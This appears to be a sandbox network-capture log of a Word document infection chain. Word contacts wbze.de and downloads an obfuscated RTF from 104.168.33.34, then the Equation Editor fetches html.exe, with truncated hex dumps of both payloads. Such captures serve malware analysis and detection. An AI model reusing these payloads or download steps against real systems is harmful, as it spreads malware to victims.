May 6, 2024 14:59:04.601027966 CEST	550	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:04 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/ Content-Length: 297 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	109.71.253.25	80	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 14:59:05.596797943 CEST	112	OUT	HEAD /u7xc HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: wbze.de
May 6, 2024 14:59:05.815908909 CEST	236	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:05 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/u7xc Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.22	49164	109.71.253.25	80

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 14:59:10.745825052 CEST	124	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: wbze.de
May 6, 2024 14:59:10.964819908 CEST	550	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:10 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/ Content-Length: 297 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>
May 6, 2024 14:59:12.016588926 CEST	154	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
May 6, 2024 14:59:12.241651058 CEST	549	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:12 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/ Content-Length: 297 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>
May 6, 2024 14:59:13.405797005 CEST	154	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
May 6, 2024 14:59:13.625000954 CEST	549	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:13 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/ Content-Length: 297 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49168	109.71.253.25	80	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 14:59:14.775495052 CEST	342	OUT	GET /u7xc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: wbze.de Connection: Keep-Alive
May 6, 2024 14:59:14.993972063 CEST	558	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:14 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/u7xc Content-Length: 301 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 75 37 78 63 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/u7xc">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>
May 6, 2024 14:59:16.611485958 CEST	131	OUT	HEAD /u7xc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: wbze.de Content-Length: 0 Connection: Keep-Alive
May 6, 2024 14:59:16.829956055 CEST	235	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 06 May 2024 12:59:16 GMT Server: Apache/2.4.38 (Debian) Location: https://wbze.de/u7xc Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49170	104.168.33.34	80	1516	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 14:59:16.079720974 CEST	486	OUT	GET /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 104.168.33.34 Connection: Keep-Alive
May 6, 2024 14:59:16.246083021 CEST	1289	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 12:59:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 06 May 2024 08:33:05 GMT ETag: "13818-617c4eb19287f" Accept-Ranges: bytes Content-Length: 79896 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 7b 5c 2a 5c 77 7a 4e 61 6d 65 35 34 31 37 39 31 33 31 35 20 5c 5b 7d 0d 7b 5c 34 33 38 39 37 33 38 36 a7 2f 30 b5 2c 3e 24 5b 38 33 21 3f 30 27 29 2d 7c 40 3f 5e 40 5e 3f 2b 28 5b 3b 38 38 37 60 60 7c 34 21 32 21 3f b5 3f 23 7c 2e 31 3f 7e 30 7e 28 5f 25 29 5b 21 25 27 3d 37 7c 3f 3f 7e 3e 25 3f 3f 36 b5 33 38 7c 5d b5 35 3d 2a 24 3f 2f 3f 3c 2c 34 2d 26 5e 3f 31 30 3c 25 3f 31 3f 3f 2b 2d 36 7c 3c b5 5e 3b 32 3d 32 3d 39 b5 40 25 2b 3b 25 5f 7c 3f 39 2d 34 36 5e 25 2f 5d b0 3c 5b 25 35 5f 5e 24 31 b5 27 40 2c 2c 29 b5 24 21 b5 33 35 36 7e a7 a7 3f 39 38 28 32 24 3f 27 3d 5f 3f 3e 28 35 5e 3f b0 5d 3c 32 32 31 33 38 2a 3f 5f 36 b0 2b 60 34 40 2f 37 7c 3d 3f 2f 28 3f 21 34 3f 2a 2e 5e 2f b0 3f 2e 2d 2c 34 b0 27 2e a7 2a 3a 5e 3c 5e 7c 39 36 5b 23 37 36 7e 2c 30 7e 60 a7 3f 25 34 29 5b 25 5f 3f 26 26 35 30 5e 23 35 a7 39 32 31 25 2f 25 7c 27 5f 30 2c 3e 36 b5 32 25 60 33 3d 27 37 37 3e 39 3c 3e 5e 38 2a 27 24 21 26 3a 38 27 3b 34 2e 30 5b 24 7e [TRUNCATED] Data Ascii: {\rtf1{\\wzName541791315 \[}{\43897386/0,>$[83!?0')-\|@?^@^?+([;887``\|4!2!??#\|.1?~0~(_%)[!%'=7\|??~>%??638\|]5=$?/?<,4-&^?10<%?1??+-6\|<^;2=2=9@%+;%_\|?9-46^%/]<[%5_^$1'@,,)$!356~?98(2$?'=_?>(5^?]<22138?_6+`4@/7\|=?/(?!4?.^/?.-,4'.:^<^\|96[#76~,0~`?%4)[%_?&&50^#5921%/%\|'_0,>62%`3='77>9<>^8'$!&:8';4.0[$~.;4139>'.,'^5`)`1:0?)?<,^3%>$9~34[%:649=?$``^_]%])@%.4?&`\|][[?;2/-@@<2&4?,,?^=017?_'.<?^?3?(\|)-?9.-0(]?%`;-0531;$90)1~-#+\|?+?=.$.2`%^.>?&/>>7[87?)2:3%5,<?#4!->8-^___]_.3-;]+<1/,?@8?+0@%5\|0:@4[][?80$&]?&?.[~4&>(]<5-'_?+4\|#@2~>><<++@(<9#\|/9'>%'[@7>$[_#('~6<&.%(+7=1!.?3.9,?)=_?;<4<`[,75_[->.>@#89)+>&%?;33\|(=:??0-5^,?0%\|!4_7_6$:%??7437__;86\|?+5?,,^>(~;\|-6&=1~?3~9;??($\|1+,?3%3?)?[2%??6?77?;#,?>-6?3849?5!9@7?7^3?76357-'=??-([-\|/(6\|?7;7(_?;1:?)<%'`8??./@`0?/6)%?=,6>?1<~?6(]'\|1_\|'<;~9[97@?,~2>\|)=%37)?`8;(??,?.9(#`%/81?#^^88??]`^53?[^,\|\|^_222^?<?^,?1\|\|*=]?%^<>.-?]+%:.@'5+;;>/`#
May 6, 2024 14:59:16.246104002 CEST	1289	IN	Data Raw: 38 3f 25 3e 5d 3a 28 2a 25 3f 7e 5d 3e b5 25 5e 3d 3d 3e 30 5f 38 2c 34 3f 3f 3f 3e 3f 36 7c 2f 3c 60 5f 25 2e 5f b5 37 27 24 2d 3e 27 27 32 5f 5e 21 3f 3f 2f 3c 21 2a 25 3f 2c 3f 3f 37 28 39 28 7c 3f 3e b0 36 b5 3f 7c 3a 2c 2c 7e 29 3f 7c 29 a7 Data Ascii: 8?%>]:(%?~]>%^==>0_8,4???>?6\|/<`_%._7'$->''2_^!??/<!%?,??7(9(\|?>6?\|:,,~)?\|)'<1=~]#,;00#:'5@$&__3?/;&1%3>_1=%?^6.[[$),\|@@:-`%%=%[_8#\|?+[%^,.=#33=-]11=84\|.<?]=0%6)&1?%?*?.4!~/1].'527$!?):8+/[%#:+@?(@<0-;6+3\|:$;$%#,!7-:]8$[?%<9@
May 6, 2024 14:59:16.246114969 CEST	1289	IN	Data Raw: 2d 34 2c 28 3f 36 2b 37 5e 35 37 25 2b 31 3e a7 60 25 35 2e b5 39 25 3f 2e 32 7c 30 36 3f a7 3d 26 5e 30 2b 3d 2b 3f 2b 3f 33 2c 2b 33 28 2f 36 30 34 38 7e b5 3e 3a 2a 32 40 33 3d 24 2e 60 3e 25 31 2a 2d 21 60 32 7e 3f 38 3f 5d b5 3e 3c 25 2e 2f Data Ascii: -4,(?6+7^57%+1>`%5.9%?.2\|06?=&^0+=+?+?3,+3(/6048~>:2@3=$.`>%1-!`2~?8?]><%./-?9/06?>$($%8#?&#'(@4^)'&;`@812=_'`4?.6,?@:[8#1?4</?1,-%~%77'>@-287++\|@2%2.\|>05\|~0<8!?^663]#1;:1`?-$1;7???%_&#])'5):?#'[!%:3-*1$?;$~@6@&)+`]??^=<3`66
May 6, 2024 14:59:16.246128082 CEST	1289	IN	Data Raw: 38 36 30 30 36 39 30 4d 48 4f 49 55 41 54 4d 48 57 47 44 48 63 72 74 61 73 6d 67 76 79 6b 66 65 65 75 7d 7d 0a 0a 0d 0a 0a 0a 0d 0d 33 31 39 20 20 20 20 09 09 20 20 09 20 20 09 09 09 20 20 20 20 09 20 20 09 20 09 63 64 0a 0a 0d 20 5c 62 69 6e 30 Data Ascii: 8600690MHOIUATMHWGDHcrtasmgvykfeeu}}319 cd \bin000000e44020 000 00 1e00000069
May 6, 2024 14:59:16.246145010 CEST	1289	IN	Data Raw: 20 09 20 09 09 30 20 20 09 20 09 09 20 09 20 20 20 09 09 20 20 20 20 09 20 20 09 20 09 09 30 30 30 0a 0d 0a 0a 0a 0d 0d 0d 30 30 33 20 09 20 09 20 20 09 09 20 09 20 20 20 09 20 20 09 09 20 20 09 20 09 09 65 09 09 09 20 20 09 09 09 09 20 09 20 09 Data Ascii: 0 000003 e 0 00 3 00feff0900 06000000
May 6, 2024 14:59:16.246157885 CEST	1289	IN	Data Raw: 09 20 09 20 09 09 09 09 20 09 09 20 09 09 09 20 20 09 20 09 09 20 09 66 09 09 20 09 20 20 09 09 20 09 20 20 09 20 09 09 09 20 09 20 20 09 20 09 66 66 09 20 09 09 09 20 09 09 20 09 20 20 09 20 09 09 09 20 09 20 20 09 20 09 66 66 66 09 20 20 20 09 Data Ascii: f ff fff fffff ff ff ff fff
May 6, 2024 14:59:16.246170998 CEST	1289	IN	Data Raw: 66 66 0d 0d 0a 0d 0a 0a 0a 0d 66 66 0a 0a 0d 0d 0a 0a 0a 0d 66 66 20 09 20 09 09 20 09 20 09 09 09 20 09 20 09 20 20 09 20 09 20 09 09 20 66 20 20 20 09 09 20 09 20 09 09 09 20 09 20 09 20 20 09 20 09 20 09 09 20 66 66 66 66 09 09 09 09 09 09 09 Data Ascii: ffffff f ffff fffffff f fff fffffffff
May 6, 2024 14:59:16.246187925 CEST	1289	IN	Data Raw: 66 66 66 66 0d 0d 0d 0a 0a 0d 0a 0d 66 66 0a 0a 0a 0a 0a 0d 0a 0d 66 66 66 0d 0a 0d 0a 0a 0d 0a 0d 66 66 0a 0a 0d 0d 0d 0a 0d 0a 66 66 66 0d 0a 0d 0d 0d 0a 0d 0a 66 09 09 09 20 20 09 09 09 20 09 20 20 20 09 20 20 20 20 20 09 20 20 20 20 66 66 66 Data Ascii: fffffffffffffff fff fffffff fffffff ffffff
May 6, 2024 14:59:16.246201038 CEST	1289	IN	Data Raw: 20 20 20 09 09 20 20 66 0d 0a 0d 0a 0d 0d 0a 0a 66 66 66 66 0d 0a 0a 0a 0d 0d 0a 0a 66 66 66 66 09 09 09 09 20 09 09 09 20 09 09 20 20 20 09 09 09 20 20 20 09 09 20 20 66 0a 0a 0d 0a 0d 0d 0a 0a 66 0a 0a 0a 0d 0d 0a 0d 0a 66 0a 0a 0d 0d 0d 0a 0d Data Ascii: fffffffff fffff f fff fffffffffff
May 6, 2024 14:59:16.246213913 CEST	1289	IN	Data Raw: 0d 0d 0d 0a 0a 0d 0a 66 0a 0a 0d 0d 0a 0a 0d 0a 66 0d 0a 0d 0d 0a 0a 0d 0a 66 66 0d 0a 0a 0a 0a 0a 0d 0a 66 66 66 66 66 20 20 20 09 20 09 20 20 20 09 20 20 09 09 09 09 09 09 09 20 09 09 20 20 66 20 20 09 20 09 20 20 20 20 09 20 20 09 09 09 09 09 Data Ascii: fffffffff f ff fff ffffff f f
May 6, 2024 14:59:16.408902884 CEST	1289	IN	Data Raw: 09 20 20 09 09 09 20 20 09 20 66 66 66 0d 0a 0a 0d 0d 0a 0d 0a 66 0d 0a 0a 0d 0d 0a 0d 0a 66 0d 0a 0a 0d 0d 0a 0d 0a 66 09 09 09 20 20 20 09 20 09 09 20 09 20 20 09 20 20 09 09 20 09 20 09 20 66 20 09 09 20 09 20 09 20 09 09 20 09 20 20 09 20 20 Data Ascii: ffffff f fff ff fffff ff f
May 6, 2024 14:59:17.736639977 CEST	275	OUT	HEAD /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 104.168.33.34 Content-Length: 0 Connection: Keep-Alive
May 6, 2024 14:59:17.902117014 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 12:59:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 06 May 2024 08:33:05 GMT ETag: "13818-617c4eb19287f" Accept-Ranges: bytes Content-Length: 79896 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49172	104.168.33.34	80	3148	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
May 6, 2024 14:59:19.438949108 CEST	313	OUT	GET /5457/html.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.33.34 Connection: Keep-Alive
May 6, 2024 14:59:19.598732948 CEST	1289	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 12:59:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 06 May 2024 08:40:11 GMT ETag: "b7e00-617c5048189d1" Accept-Ranges: bytes Content-Length: 753152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 99 e2 d5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 12 01 00 00 00 00 00 ae 89 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 89 0a 00 4f 00 00 00 00 a0 0a 00 f0 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 0c 68 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0j @ @YOhp H.texti j `.rsrcl@@.reloc\|@BHXFDX0irp}rp}(}=(+,(+,>(+,(+<(+,(*0 {O%=oo (+9O% ooO%o(~o ,n~o!~o"Q,=+&osOoQ}XiY-
May 6, 2024 14:59:19.598915100 CEST	1289	IN	Data Raw: 2b 0d 00 02 72 03 00 00 70 7d 01 00 00 04 00 00 de 11 13 0e 00 02 72 3b 00 00 70 7d 01 00 00 04 00 de 00 00 2b 0d 00 02 72 7b 00 00 70 7d 01 00 00 04 00 2a 01 10 00 00 00 00 62 00 9c fe 00 11 11 00 00 01 1b 30 05 00 20 01 00 00 02 00 00 11 00 02 Data Ascii: +rp}r;p}+r{p}*b0 {O%>oo (+9O% ooO%o(~o ,n~o!~o"Q
May 6, 2024 14:59:19.598931074 CEST	1289	IN	Data Raw: 06 6f 12 00 00 06 00 06 02 6f 42 00 00 0a 6f 43 00 00 0a 00 06 0b 2b 00 07 2a 00 13 30 01 00 07 00 00 00 0a 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 07 00 00 00 0a 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 04 00 99 00 00 00 0b 00 00 11 00 02 03 Data Ascii: ooBoC+0+0+0(D,xoEs#oF&o3(4o5(6o7(8o9(:o;(<o=(>(?(+(F&(0/
May 6, 2024 14:59:19.598947048 CEST	1289	IN	Data Raw: 00 7c 41 16 19 16 73 6a 00 00 0a 6f 6b 00 00 0a 00 02 7b 0e 00 00 04 1f 0f 1f 4b 73 6c 00 00 0a 6f 6d 00 00 0a 00 02 7b 0e 00 00 04 72 b5 01 00 70 6f 6e 00 00 0a 00 02 7b 0e 00 00 04 20 a9 00 00 00 1f 19 73 6f 00 00 0a 6f 70 00 00 0a 00 02 7b 0e Data Ascii: \|Asjok{Kslom{rpon{ soop{oq{rpor{oi{rYp"\|Asjok{ slom{rpon{msoop{oq{rpor
